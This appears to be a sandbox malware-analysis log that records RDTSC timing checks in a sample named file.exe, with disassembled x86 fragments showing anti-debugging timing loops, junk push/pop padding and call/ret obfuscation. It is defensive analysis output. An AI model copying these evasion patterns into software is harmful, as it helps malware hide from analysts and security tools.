Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAA9F second address: 4AAACA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3D90F37F2Eh 0x00000008 jmp 00007F3D90F37F28h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F3D90F37F16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAACA second address: 4AAAEF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F3D90D93B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D90D93B57h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAC7C second address: 4AAC81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0DD4 second address: 4A0DD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0DD9 second address: 4A0DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAF1E second address: 4AAF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAF24 second address: 4AAF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3D90F37F16h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AFE52 second address: 4AFE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F3D90D93B46h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1355 second address: 4B1359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1359 second address: 4B135F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B135F second address: 4B137E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3D90F37F1Ch 0x00000008 jno 00007F3D90F37F16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 js 00007F3D90F37F16h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B827C second address: 4B82AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F3D90D93B48h 0x0000000b jmp 00007F3D90D93B58h 0x00000010 popad 0x00000011 pushad 0x00000012 push edi 0x00000013 jg 00007F3D90D93B46h 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B82AF second address: 4B82B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B7830 second address: 4B784E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 je 00007F3D90D93B46h 0x0000000c jnl 00007F3D90D93B46h 0x00000012 pop eax 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 jbe 00007F3D90D93B46h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B79AD second address: 4B79B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B79B2 second address: 4B79BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F3D90D93B46h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B79BF second address: 4B79D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F1Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B79D5 second address: 4B79DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B79DB second address: 4B79DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B7E3B second address: 4B7E58 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D90D93B46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F3D90D93B4Ch 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8138 second address: 4B813C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BAEF8 second address: 4BAF19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F3D90D93B56h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46F058 second address: 46F05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BCE01 second address: 4BCE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F3D90D93B4Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD2CF second address: 4BD2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD2D3 second address: 4BD2D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD3A3 second address: 4BD3A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD511 second address: 4BD516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BDFE0 second address: 4BDFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE0EB second address: 4BE108 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F3D90D93B52h 0x00000011 jmp 00007F3D90D93B4Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE5DD second address: 4BE5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BEDC8 second address: 4BEDCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BEDCE second address: 4BEDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BFFBF second address: 4BFFC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C08FB second address: 4C0948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov esi, dword ptr [ebp+122D26B4h] 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 mov edi, dword ptr [ebp+122D394Dh] 0x00000016 pop esi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F3D90F37F18h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1BD3h], eax 0x00000039 push eax 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jns 00007F3D90F37F16h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C1112 second address: 4C1127 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3D90D93B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F3D90D93B46h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C1C32 second address: 4C1C3C instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D90F37F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2791 second address: 4C2797 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C1C3C second address: 4C1C41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C29EE second address: 4C29F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2797 second address: 4C27BD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D90F37F1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D90F37F22h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C29F4 second address: 4C29F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C1C41 second address: 4C1C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C27BD second address: 4C27C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C29F8 second address: 4C2A65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov si, 82C8h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F3D90F37F18h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 xor esi, 240AB37Ah 0x0000002f mov esi, 429F2E41h 0x00000034 push 00000000h 0x00000036 mov esi, 43852738h 0x0000003b xchg eax, ebx 0x0000003c jg 00007F3D90F37F30h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2A65 second address: 4C2A7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C575A second address: 4C575E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6CE5 second address: 4C6CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6CE9 second address: 4C6CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6CED second address: 4C6D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F3D90D93B48h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov bh, 84h 0x00000026 push 00000000h 0x00000028 mov di, si 0x0000002b push 00000000h 0x0000002d jo 00007F3D90D93B55h 0x00000033 jmp 00007F3D90D93B4Fh 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jns 00007F3D90D93B4Ch 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7DDE second address: 4C7DEC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3D90F37F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6F14 second address: 4C6F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7DEC second address: 4C7DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6F18 second address: 4C6F28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6F28 second address: 4C6F2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6F2D second address: 4C6F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3D90D93B46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3D90D93B55h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6F52 second address: 4C6F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F3D90F37F16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8C4B second address: 4C8C59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6F5C second address: 4C6F60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8C59 second address: 4C8C5F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7038 second address: 4C7044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3D90F37F1Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8C5F second address: 4C8CCC instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D90D93B4Ch 0x00000008 ja 00007F3D90D93B46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 jmp 00007F3D90D93B56h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F3D90D93B48h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 mov ebx, 0840AD90h 0x0000003a mov edi, dword ptr [ebp+122D261Dh] 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 ja 00007F3D90D93B4Ah 0x00000048 push eax 0x00000049 jc 00007F3D90D93B4Eh 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8E9A second address: 4C8F4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007F3D90F37F23h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F3D90F37F18h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov dword ptr [ebp+122D1F15h], ebx 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c jmp 00007F3D90F37F28h 0x00000041 mov eax, dword ptr [ebp+122D0E31h] 0x00000047 clc 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007F3D90F37F18h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 mov edi, dword ptr [ebp+122D2CCCh] 0x0000006a nop 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F3D90F37F28h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9E6F second address: 4C9E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9E73 second address: 4C9E8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3D90F37F1Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9E8B second address: 4C9F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a add ebx, dword ptr [ebp+122D3939h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov ebx, esi 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F3D90D93B48h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a or edi, dword ptr [ebp+122D2D1Fh] 0x00000040 mov eax, dword ptr [ebp+122D1171h] 0x00000046 mov dword ptr [ebp+122D18AAh], esi 0x0000004c push FFFFFFFFh 0x0000004e mov edi, dword ptr [ebp+122D3C09h] 0x00000054 nop 0x00000055 jmp 00007F3D90D93B53h 0x0000005a push eax 0x0000005b pushad 0x0000005c jg 00007F3D90D93B4Ch 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD379 second address: 4CD37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD4EE second address: 4CD4FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE6F3 second address: 4CE6F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D14D5 second address: 4D1520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3D90D93B58h 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F3D90D93B4Ch 0x00000011 push 00000000h 0x00000013 xor edi, dword ptr [ebp+122D3C69h] 0x00000019 push 00000000h 0x0000001b mov bx, 89BAh 0x0000001f cmc 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F3D90D93B4Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D257C second address: 4D259D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F1Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3D90F37F1Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D259D second address: 4D25A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D0670 second address: 4D0676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D1680 second address: 4D1702 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F3D90D93B50h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F3D90D93B48h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 jl 00007F3D90D93B52h 0x00000036 jl 00007F3D90D93B4Ch 0x0000003c or edi, dword ptr [ebp+122D2D8Ah] 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 sub dword ptr [ebp+1247B27Ch], eax 0x0000004f mov eax, dword ptr [ebp+122D0931h] 0x00000055 push edi 0x00000056 pushad 0x00000057 xor ebx, 7EFE7911h 0x0000005d add dword ptr [ebp+122D2C4Ah], ecx 0x00000063 popad 0x00000064 pop edi 0x00000065 push FFFFFFFFh 0x00000067 push eax 0x00000068 push esi 0x00000069 push esi 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CF6C9 second address: 4CF6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D0715 second address: 4D071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D3466 second address: 4D34F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov di, 5511h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F3D90F37F18h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov ebx, 2FA471FEh 0x0000002e call 00007F3D90F37F1Dh 0x00000033 mov ebx, ecx 0x00000035 pop ebx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F3D90F37F18h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D2B94h] 0x00000058 xchg eax, esi 0x00000059 push edi 0x0000005a jmp 00007F3D90F37F1Dh 0x0000005f pop edi 0x00000060 push eax 0x00000061 pushad 0x00000062 ja 00007F3D90F37F18h 0x00000068 push eax 0x00000069 push edx 0x0000006a push edi 0x0000006b pop edi 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D071B second address: 4D073B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F3D90D93B4Ah 0x00000014 popad 0x00000015 rdtsc
